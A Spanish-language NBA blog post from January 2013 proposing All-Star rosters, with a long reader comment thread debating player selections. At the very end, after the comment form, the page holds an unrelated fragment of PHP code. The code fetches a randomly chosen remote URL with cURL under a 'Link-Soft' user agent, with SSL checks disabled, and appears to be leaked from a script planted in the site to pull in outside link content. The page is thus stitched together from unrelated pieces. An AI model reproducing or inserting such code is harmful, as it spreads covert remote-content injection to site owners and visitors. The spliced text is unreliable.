Los All Stars de TJNBA’13

22 de January de 2013 por TheDeerHunter

houston all starLa semana pasada se anunciaron los quintetos del All-Star Game de la próxima edición en Houston. No hubo demasiadas sorpresas sobre el papel. Por el Este saldrán de inicio Rondo, Wade, LeBron, Carmelo y Garnett, y por el Oeste lo harán Paul, Bryant, Durant, Griffin y Dwight Howard. Decir que Kobe ha sido el más votado y junto a Garnett escalan a la segunda posición histórica de elecciones consecutivas con 15, empatando a Shaq. Jabbar sigue superándolos ampliamente con 19. El próximo jueves se anunciarán los reservas elegidos por los técnicos. Como es tradición cada año ofrecemos nuestra visión personal de quiénes deberían ser a nuestro juicio los 24 participantes.

OESTE

Quinteto inicial:

Chris Paul: Coincidimos con la elección popular. No existe una sola razón para decir lo contrario. Temporadón que se está marcando CP3 y sus Clippers. Es el mejor base de la liga y si todo sigue así sonará en las quinielas para el MVP con total justicia.

Kobe Bryant: El único pero que podemos poner es que haya sido elegido con el mayor número de votos. Horrible campaña en lo colectivo pero no en lo individual. Para muchos sigue siendo el mejor escolta de la liga. La Mamba negra es especialmente mortífera cuando se ve acorralada.

Kevin Durant: Para un servidor es el MVP de lo que va de curso y el jugador más en forma del momento. Es un año señalado en su carrera y cada día toca demostrar más cosas. Fue el MVP del evento el año pasado y no extrañaría a nadie que lo fuera también éste.

David Lee: Diría que es la primera injusticia de los quintetos, aunque no la más sangrante. La trayectoria de los Warriors merecería esta representación. Lee está anotando más que Griffin, reboteando más, asistiendo más… y recordemos que no ha disfrutado de Bogut al lado para evitar el trabajo sucio.

Tim Duncan: Terrible injusticia. El pueblo ha perdido una oportunidad única de hacerle un homenaje a su altura, especialmente si tenemos en cuenta que el año pasado no fue de la partida. Pero vamos, independientemente del plano emotivo me parece imposible que nadie que haya visto 2 partidos suyos este año crea que Howard ha hecho mejor campaña que Duncan hasta el momento.

Reservas:

Russell Westbrook: Bestialidad de campaña. La única razón por la que no entrará en las quinielas por el MVP es la alargada sombra de su compañero. Ambos, por si les faltaba algo, están asistiendo más y mejor que nunca. Como base quizá no sea tan puro como Paul, pero por lo demás tiene poco que envidiar a nadie.

James Harden: No hace falta repetir que es uno de los nombres del año. Su impacto en Houston es significativo. Un talento que sabíamos podía explotar en cualquier momento. Imprescindible en este evento, en casa. Cabe recordar que hay dos plazas fijas para G reservas.

Blake Griffin: Titularidad aparte, parece incuestionable que se ha ganado participar en el evento. Se observa una mejora cualitativa en su juego, más eficaz. Ha mejorado su lanzamiento medio y su juego al poste, además de su defensa. Por encima de todo esto, a lo que nos ocupa, él es espectáculo.

Dwight Howard: Probablemente sea el año en el que menos méritos presenta. Con todo, mermado como ha estado, sus números se defienden solos y su presencia condiciona el planteamiento de los partidos. Suele dar mucho juego en este tipo de citas.

LaMarcus Aldridge: Jugador exquisito y regular como él solo. Prácticamente clava el nivel que le llevara a la edición del año pasado y la competencia directa no ha crecido tanto. Es la principal razón de que los Blazers puedan pelear la 8ª plaza. No hay motivos para que se pierda la fiesta. Con él se completan las 3 plazas fijas de F reservas.

Tony Parker: La primera Wild Card, según nuestro criterio, iría parar al francés en dura pugna con Stephen Curry. Aunque el Warrior es debilidad de muchos, si hay alguien que infravalora a Parker no somos nosotros. El francés está cuajando posiblemente su mejor campaña en la NBA, lanzando mejor que nunca. Además, los Spurs se merecen un equilibrio de poderes frente a la doble presencia de Thunder y Clippers… y me temo también Lakers.

Marc Gasol/Zach Randolph: Tanto monta, que monta tanto. Cualquiera de los dos nos sirve y debería entrar por fuerza uno de ellos. Ambos están cuajando una campaña fabulosa y muy pareja en todos los sentidos. Lo único que podría hacer peligrar la presencia de un Grizzlie sería la falta de un 3 reserva. En ese caso habría que considerar a Batum.

LeBron Kobe All Star

ESTE

Quinteto inicial:

Rajon Rondo: Con Rose fuera y Deron más inconsistente que nunca, hay pocas dudas que la elección debe de ir al base de los Celtics. Gran temporada, pero muchos esperábamos algo más, como mínimo un punto más de autocontrol que aportan los años. En cualquier caso la elección es justa.

Dwyane Wade: Su campaña más “mundana” desde la de rookie. Se aprecia un cierto declive en su juego. Por suerte para él tampoco hay mucha competencia en su puesto. Sigue siendo el mejor escolta del Este.

LeBron James: Decir que quizás sea su mejor campaña en Miami desde el punto de vista individual puede parecer muy fuerte, sin embargo por un lado los Heat parecen más asequibles que el año pasado y por el otro él parece que aún no se ha puesto del todo serio. Es un jugador increíble.

Carmelo Anthony: Candidato claro al MVP. Es su temporada más madura y el talento siempre lo ha tenido. Si los Knicks terminan bien el curso a nadie podría extrañarle que lo fuera. Él está jugando mucho de PF este año, así que su elección aquí tampoco debe sorprender.

Joakim Noah: Para mí la gran injusticia de la edición. El superlativo rendimiento de Noah es la principal causa de que los Bulls se encuentren en la actual situación privilegiada, a la espera de la vuelta de Rose. Para mí sólo hay un nombre que le podría discutir el puesto. No es Garnett, sino Chandler. Los perfiles defensivos jamás han estado bien valorados.

Jrue Holiday: Sensacional rendimiento de un base que, por fin ha explotado. Promediar más de 19 puntos y 9 asistencias no está al alcance de muchos. El único pero es que los Sixers están ahora mismo fuera de postemporada, pero eso no debería justificar su ausencia.

Paul George: Al fin ha tomado galones en Indiana, como muchos esperábamos. Va de menos a más, llegando a promediar un doble doble con rebotes en Enero. Tampoco hay mucha competencia en el perímetro, así que apostaríamos a que su presencia es segura.

Paul Pierce: Al contrario, lo más seguro es que no va a estar. Es altamente improbable que aparezcan tres representantes de los Boston Celtics, así que la elección popular de Garnett le deja fuera. Por mi parte si he de elegir entre uno de los dos no tengo ni la más mínima duda este año.

Al Horford: Como Aldridge en el Este es uno de los interiores más constantes. Está en los números que le han llevado al evento otros años y la competencia en el puesto no ha subido especialmente.

Tyson Chandler: Imprescindible en la cita, como lo es en los New York Knicks. El trabajo oscuro del mejor defensor del curso pasado marcará el cuadro final de la campaña. Este año no está peor que el pasado. Merece sobradamente este reconocimiento por parte de los técnicos.

Kyrie Irving: En mi opinión la primera wild card de su conferencia debería ser suya. Es uno de los bases más brillantes y eficaces de la competición este año. Sin embargo pesará mucho que los Cavs no luchan por postemporada. Por el reparto de plazas intuyo que en su lugar irá un Buck o un Net. Base para más señas.

Brook Lopez: Gran campaña cuando ha estado. Su presencia significa victorias para los Nets. Diría que será él el representante de la franquicia en la cita. Lo merece, a pesar de que es casi una locura que Josh Smith no haya ido nunca.

Comenta

27 comentarios a esta entrada

  1. Simon dice:
    #1

    Mi opinión personal
    en el OESTE:
    – En el quinteto nada que objetar, justo los dos cambios que haceis son los dos que yo haría.
    – Tanto Zach como Marc han bajado banderas últimamente asi que la segunda wildcard iría para Steph Curry, total con Duncan/Aldridge/Howard/Lee ya tenemos bastantes grandotes para cubrir los minutos de C ( algunos de F ) aunque eso de las posiciones en este evento es lo de menos.
    En el ESTE:
    – Nos dejamos a Josh Smith en casa otra vez? para mi debería ir por delante de Horford.
    – Noah iría fuera, su lugar en el quinteto lo ocuparían o bien Chandler o Lopez ( me da igual ) en lugar de Noah y como suplente el premiado en los Bulls sería Boozer.
    – No me mola mucho el hecho de que Kyrie Irving vaya al all-star siendo tan joven y su equipo sea el segundo peor de la liga, y pronto al ritmo que va wizards con wall serán el peor equipo de la liga. ( por ejemplo Kobe aunque su equipo este mal solo por trayectoria tiene su hueco en el all-star ), en su lugar pondría quizás a Jennings. Este año ha progresado y esta haciendo jugar mas a su equipo, aunque a rachas.

      Citar

  2. HisRoyalAirness dice:
    #2

    El voto popular debería estar prohibido.

    OESTE:
    Me da igual lo que me digáis de Kobe pero que haya 2 titulares de un equipo que no está en Playoffs clama al cielo. De cualquier otro diríamos que es un hace-números. All-Star? De acuerdo, pero el quinteto debe reservarse a los que están haciendo mejor campaña, no a nombrecitos. El segundo mejor “guard” del Oeste en lo que va de temporada sería Parker o Westbrook.

    De acuerdo con CP3 y Durant, los otros 3, 3n mi opinión no merecen formar parte del quinteto (unos por la clasificación de su equipo y el otro porque no es el mejor en su posición y punto). Que Timmy-D no esté con el temporadón que está haciendo a sus años es de juzgado de guardia.
    El año que viene, cuando Lin sea votado como titular, ya cambiaran el método de elección ya lo veréis.

    De los reservas poco que decir, sólo que creo los citados Parker, Westbrook, The Big Fundamental, Lee, Harden lo tienen más que merecido. Y Marc, aunque no esté haciendo unos números espectaculares es el pilar fundamental del 5º mejor equipo de la liga.

    ESTE

    Nada que añadir a la lista de Deer salvo que me gustaría saber a qué país ofreció Garnett ayuda humanitaria para que le votaran en masa. Para mí no es All-Star ni de coña. Noah titular sin duda.
    Ah, y creo que no es normal que Josh Smith no haya sido nunca A-S.

      Citar

  3. Jose Luis dice:
    #3

    Primero, totalmente de acuerdo que los votos no deberían dar titularidades. Podrían ser escogidos para el all-star (por todo lo que es espectáculo, interacción con el aficionado, vender el producto) pero que el entrenador pudiera elegir entre los 12 a los que quiera poner de titulares.

    En cuanto al Oeste: mis titulares serían CP3 – Westbrook – Durant -Griffin – Duncan. Estadísticamente son de lo mejor del Oeste y además con récords ganadores. De suplentes: Parker – Bryant – Harden – Lee – Aldridge – Howard , y aquí me entra la duda. Si es un alero, Batum o Kirilenko. Si no, pues Zach Randolph.

    En el Este: Rondo – Wade – Lebron – Anthony – Noah. Suplentes: Holiday – Irving – George – Pierce – Horford – López – Chandler

    Una pena que el récord de los Kings no deje ir a Cousins. Creo que es la peor campaña de Josh Smith en años, al menos en ataque, y en defensa no creo que haya mejorado, si hay un all-star de Hawks este debe ser Horford. Noah ha aguantado a los Bulls todo el año, muy constante y casi siempre con dobles-dobles altos. Si un Bull merece ir es él, Boozer lleva jugando bien 2 semanas. Jennings me parece muy irregular.

      Citar

  4. melo15 dice:
    #4

    Oeste:
    Estoy bastante de acuerdo con la lista pero difiero en algunos casos, para empezar Griffin ha de ser titular, si no esta haciendo mejores estadisticas es por el juego coral de los Clippers.
    Tambien Curry tendria que ir, porque aunque Lee este jugando mejor que el, Curry es el lider de este equipo y lo demostro ayer ante los Clippers en el ultimo cuarto.
    y por ultimo yo a Marc no lo pondria, empezo muy bien asistiendo mucho pero todas sus estadisticas han bajado y ni si quiera ahora asiste tanto. En lo unico que no ha empeorado es en la dfensa que sigue siendo buena.
    Este:
    De acuerdo con todo menos con la eleccion de Pierce que deberia ser para Josh Smith y la de Irving que deberia ser para Deron, porque aunque no sea su mejor temporada su equipo esta bien posicionado y encima ahora desde la marcha de Avery Johnson esta jugando mucho mejor.

      Citar

  5. Txusma dice:
    #5

    Nada. Stephen Curry ha de ir al All Star sí o sí. Está por encima de Batum, Kirilenko, Randolph… y Howard.

    En el Este, Mi quinteto sería el de Jose Luis pero metiendo a Holiday por Wade. Sólo él y Westbrook son capaces de anotar más de 19 puntos y repartir más de 9 asistencias. Ojito. Tb apuesto por Noah de titular y en me chirría la presencia de Pierce. Es parecido al caso Howard. Sus equipos no están llevando a cabo buenas campañas, ya tienen un compañero seleccionado y ellos no están supers aunque los fríos números no sean malos. Claro que tampoco tengo un candidato tan claro como en el Oeste con Curry. A lo mejor sí que prefería a Jennings.

    Y después de todo esto, pena no llevar a nadie de los Nuggets. Les perjudica ese juego tan de equipo que practica.

      Citar

  6. Esteban dice:
    #6

    es increible que LOPEZ no entre de centro titular y apenas como un comodin interior

    los nets estan cuartos en el este o me parece a mi? Miami juega sin pivote y lo de HIBBERT en indiana da pena (le podriamos decir “dampier”), mientras que GARNETT junto con pierce y rondo apenas puede mantener a los celtics 20-20

    LOPEZ no solo es el pivote del este que mas punto promedia, con casi 19, sino que los acompaña con una efectividad asombrosa, unos 7.3 rebotes por juego y 2.1 tapones, algo mas? siendo pivote eso deberia ser la hostia

    lo mas llamativo es que los Nets con LOPEZ tiene un record de 23 victorias y 11 derrotas, demostrando que cuando el esta en cancha, los nets son mejores

    por otro lado, ha mostrado compañerismo y no ha sido egostia, si quisiera y su tecnico lo apoyara, en varios juegos faciles podria haberse ido hasta los 30 puntos para inflar estadisticas y no lo ha hecho, incluso recuerdo el partido con los kings con 18 puntos en 18 minutos

      Citar

  7. Jose Luis dice:
    #7

    Del Oeste acerté todos, a mi Curry no me impresionaba tanto. Del Este me ha sorprendido muchísimo Deng, la verdad es que a Bosh sí que me lo esperaba aunque no tuve huevos de ponerlo en mi porra xD Me he equivocado en Deng, puse a Pierce, y tampoco creo que Deng merezca ir al all-star, la verdad.

      Citar

  8. Txusma dice:
    #8

    Pues a mi lo de Curry me parece injustísimo, la verdad. Y lo de que vaya Bosh en lugar de Lopez también. Debería haber un jugador de los Nets en el All-Star. Finalmente, lo de Deng. Antes que él me llebava a uno de los Hawks, Horford o Smith, me da lo mismo, por aquello de la representatividad de los equipos.

      Citar

  9. Jose Luis dice:
    #9

    López podría ir por Bosh, está claro, pero a mi la inclusión de Bosh tampoco me sorprende. Curry es que no sé donde lo queréis meter. CP3, Bryant, Westbrook, Parker, Harden… ¿a quién vais a quitar? Lo de Deng es imcreíble como ha podido colarse ahí.

      Citar

  10. melo15 dice:
    #10

    Que vaya gente como Holiday y Irving y no vayan tios como Curry y Jennings que tienen sus equipos en PO es una injusticia.

      Citar

  11. Jose Luis dice:
    #11

    Vuelvo a decir, a ver quién quitáis del Oeste para meter a Curry: Westbrook, Parker, Harden.

    ¿Jennings? ese hombre del 40% en tiros de campo que ni siquiera es máximo anotador de su equipo.

      Citar

  12. Jones dice:
    #12

    Lo que no sé hasta qué punto se merece más Westbrook ir al all-star que Curry. En estadísticas es superior Westbrook, que lo superá en puntos, rebotes y asistencias, pero tiene bastantes peores porcentajes que Curry, además que pierde más balones.
    Pero vamos, que da exactamente igual las estadísticas del uno y del otro, por sensaciones de juego y por liderazgo en el equipo me quedo mil veces con Curry, además, ya le gustaría a Westbrook tener la clase que tiene Curry. La verdad es que me cansa que predomine el jugador físico antes que el talentoso en estos casos, porque una asistencia de Curry es tan espectacular o más que un mate de Westbrook, pero bueno, cada uno tendrá sus gustos y son igual de respetables.
    Lo que tampoco entiendo es lo de meter a Bosh por ley en el all-star. Como decís muchos por aquí, no entiendo como se puede haber dejado en el tintero a López, cuando ha sido el único jugador de los Nets que ha mantenido una regularidad constante en toda la temporada, y cuando ha faltado su equipo lo ha notado muchísimo. No sé hasta qué punto puede decir eso mismo Bosh en un equipo en el que si algo sobra, es liderazgo…

      Citar

  13. rumbero dice:
    #13

    Jose Luis:
    Vuelvo a decir, a ver quién quitáis del Oeste para meter a Curry: Westbrook, Parker, Harden.

    Dándole la vuelta ¿Qué le falta para llegar al nivel de estos 3 esta temporada?
    Los 5 del backcourt del oeste son dificilmente discutibles como lo es que Curry tenga que ir, una cosa no quita la otra. Es una lástima que no haya un hueco más porque el chaval es un superclase.

      Citar

  14. Esteban dice:
    #14

    lo de bosh es de risa, hasta boozer y david west estan teniendo una mejor temporada que el

    george, un par de buenos juegos y es all-star? ojo que soy fan de el y ademas soy fan de los pacers, pero josh smith viene haciendo los numeros de george hace 5 años y no lo eligen, no es justo

    lopez esta por sobre garnett y noah claramente, si cambian noah por lopez, es un cambio que favorece claramente a los bulls

    rudy gay como alero suplente, no hay alero suplente en el oeste, una verguenza

    lo de holiday no se explica, bueno numeros en un PESIMO equipo, 17-25 van los 76ers, en el oeste estarian peleando por no ser los peores de la NBA, para eso ya esta irving que tiene mejores numeros que holiday

      Citar

  15. Jose Luis dice:
    #15

    Holiday da 9 asistencias en un pésimo equipo como son los Sixers, creo que eso contaría algo, además de anotar 19 puntos con buen porcentaje de tiros de campo, un 45%

    López por encima de Garnett, pero Garnett fue por votos, no se le puede tocar. Prefiero a Noah por encima de López mil veces, no sé qué capacidad de liderazgo veis en López. Aun así López debería haber ido por Bosh.

    Cierto lo del alero suplente en el oeste, yo lo puse, si llevan alero, Kirilenko o Batum, quizá Gay también. Me parece bastante mal que no haya.

    Y de Atlanta, de ir alguien debió ser Horford. Smith está en una de sus peores temporadas ofensivamente, lanzando tiros en salto sin ton ni son y acertando un pobre 30% de los mismos. Paul George se ha echado el equipo a la espalda en ausencia de Granger y esperando a un Hibbert que nunca apareció como estrella.

    Y de nuevo Curry. David Lee es el all-star de este equipo. Queréis cambiarlo por Westbrook, ese jugador que ha evolucionado en asistencias y disminuido sus pérdidas, ese increíble acompañante de Durant, ha tenido que coger un rol mayor este año dada la partida de Harden. Kevin Martin no puede compararse a Harden.

    Quita a Westbrook, Parker o Harden de sus respectivos equipos, y verás un descenso de al menos 20% de victorias (en caso de Westbrook o Harden probablemente un 40%). Quita a Curry, y verás como Thompson, Barnes, Lee, Landry, Jack, no perderían más que 3-4 partidos. Curry no es all-star, no es tan importante siquiera en su propio equipo.

      Citar

  16. Esteban dice:
    #16

    no digo que LOPEZ tenga una gran caacidad de liderazgo, NOAH es mejor que en el muchas facetas del juego, pero LOPEZ es el unico tio de mas de 2.10 en la NBA, que tiene cierto juego ofensivo y eso que ha aumentado kilos este año y tiene menos movilidad, creo que eso vale algo,

    defensores geniales, reboteadores y lideres de centro hay muchos en la nba, sin ir ma lejos sus dos compñaeros all-star garnett y chandler me resultan mejores que noah, incluso harford

    imaginas a los bulls recahzando un trade mano a mano de lopez o harfod por noah?

      Citar

  17. Jose Luis dice:
    #17

    Yo estoy prácticamente seguro de que rechazarían ambos trades.

      Citar

  18. Txusma dice:
    #18

    Creo que infravaloras a Curry muchísimo. De hecho, creo que los Warriors perdieron los 2 partidos en los q Curry no jugó hace nada y estoy más q convencido que directiva, compañeros y aficionados contuvieron la respiración. Sin Curry, ese equipo pasaba apuros para clasificarse para los Playoffs

      Citar

  19. Esteban dice:
    #19

    Jose Luis:
    Yo estoy prácticamente seguro de que rechazarían ambos trades.

    ah si yo tambien, segurisimo je

      Citar

  20. Jones dice:
    #20

    Curiosamente, los dos partidos que no ha jugado Curry esta temporada han significado derrota para su equipo… la capacidad que tiene Curry para generar juego va mucho más allá de la capacidad física de Westbrook. Que pierda menos balones no significa que siga perdiendo muchos balones, que de más asistencias no significa que sea mejor base, lo único que significa es que ha mejorado sus números. El auténtico líder de los Thunder es Durant, Westbrook es incapaz de aceptar que puede tener un mal día, como demostró precisamente contra los Warriors el otro día, partido en el que Curry se lo merendó en todo momento.
    No sé en qué os basáis exactamente para decir que Westbrook es mejor que Curry, creo que le dáis un valor inferior al que tiene realmente, como bien ha dicho Txusma. Jugadores como Westbrook hay mil en la liga, con esa capacidad física, jugadores de la clase de Curry queda 1 o 2 y tirando por lo alto…

      Citar

  21. Jose Luis dice:
    #21

    Los Warriors han perdido 5 de los últimos 10, solo dos de esas derrotas fueron sin Curry, una ante Miami Heat y otra en San Antonio, derrotas perfectamente asumibles aún con Curry. Por otro lado, con él han perdido en Denver, en casa de Clippers sin dar siquiera batalla y contra Memphis sin presentarla también.

    Pero bueno. Para mí decir que Westbrook no merece ir a All-Star porque juega con Durant es como decir que Wade no lo merece porque juega con LeBron. Son jugadores que están prácticamente sólos en sus equipos y los tienen arriba, deben ir ambos.

    Yo no digo que Curry sea malo, de hecho merece ir al All-Star, pero no quitaría a ninguno de los que van por meterle a él, si acaso a Randolph, pero meter dos All-Star de Warriors y ninguno de Grizzlies tampoco me parece correcto.

      Citar

  22. Jose Luis dice:
    #22

    LeBron ha puesto un tweet diciendo que deberían ir 15, y pone que añadiría a Jennings, Paul Pierce y Smith, y a Curry, Crawford y Marc… vamos, que ni aún así van López ni un alero del Oeste jajajaja madre mía.

      Citar

  23. Melo15 dice:
    #23

    Me da mucha rabia la gente que subestima a los jugadores que tienen un gran fisico y basan su juego en eso, como si fuera facil tener el fisico de Westbrook, James, Rose…
    No se nace con un super fisico, el fisico se trabaja dia dia y cuidandote mucho.
    Verdad que tampoco tendriamos que subestimar a Curry por nacer con esa muñeca, porque en su caso esta claro que es genetico no?
    Westbrook es un jugadorazo que a su ni el le pudede mirar a la cara a todos los bases de la liga.
    Por otra parte creo que Curry si deberia ir al All-Star.
    Tambien pondria a Lopez y a Smith en el Este, Smith esta haciendo un temporadon, para mi es el 4 mas completo de la NBA, ataca, defiende, rebotea, asiste y tiene a los Hawks en PO, toda una injusticia que vaya Deng y el no.
    Y lo de Irving es una verguenza, a mi me parece un jugador que solo se preocupa de hacer sus 20 y tantos puntos por partido y nada de crear juego ni defender, 0 sacrificio y los Cavs con un record de verguenza hay muchos bases mejores que el, una absoluta verguenza Jennings es mejor.
    Si traemos a Irving porque no se coge a Cousins o a Lillard?

      Citar

  24. Jose Luis dice:
    #24

    Punto para Melo15, Irving fuera y Jennings dentro.

      Citar

  25. nba dice:
    #25

    Hasta se llego a hablar un posible trade por Pau Gasol, para reforzar el perimetro Laker y que a si Howard recobrase a algun viejo amigo

      Citar

  26. franitis dice:
    #26

    Leyendo a Melo15, entiendo que hasta ahora no se haya hablado de Lillard por el tema de ser rookie y se cuente con él directamente en el partido del sábado @sophomores, pero Lillard está haciendo también una temporada brillante con Portland, a la altura de la de Irving o Jennings:

    – Lillard: 18,3 ppg, 6,6 apg / Portland: 21 – 21
    – Irving: 23,7 ppg, 5,7 apg / Cleveland: 11 – 32
    – Jennings: 18,7 ppg, 5,8 apg / Milwaukee: 22 -18

    Números parecidos, excepto en record de cada equipo, pero veo más consistente y resolutivo a Lillard que a los otros dos.

      Citar

  27. rumbero dice:
    #27

    Melo15:
    Y lo de Irving es una verguenza, a mi me parece un jugador que solo se preocupa de hacer sus 20 y tantos puntos por partido y nada de crear juego ni defender, 0 sacrificio y los Cavs con un record de verguenza hay muchos bases mejores que el, una absoluta verguenza Jennings es mejor.
    Si traemos a Irving porque no se coge a Cousins o a Lillard?

    Con lo que te gustaba a ti Irving la temporada pasada cuando hablabamos de él y Ricky para la carrera del ROY…. Yo si tuviera que escoger a uno de los 3 que nombra franitis me quedaría con él sin dudarlo, por condiciones y edad. Tira mucho si, pero es que además suele hacerlo bastante bien y es que las alternativas de los Cavs son Thompson, Waiters y Zeller que son igual de novatos o los Gee, Linvingston, Gibson…o Luke Walton. Si es que posiblemente son el peor equipo de la NBA con la lesión de Varejao, como no se las va a tirar… A medida que el resto vayan mejorando veremos como afecta a su juego y dirección. Y no es cierto que sólo se preocupa de hacer sus 20 y tanto puntos, a veces también se preocupa por hacer 30 o 40, como en sus dos últimos partidos
    Para acabar, ese de poner a Jennings como ejemplo de mejor base que él…vamos ni que fuera Stockton, que el tio se casca sus 15 tiros por partido y dándole igual lo acertado que esté,

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>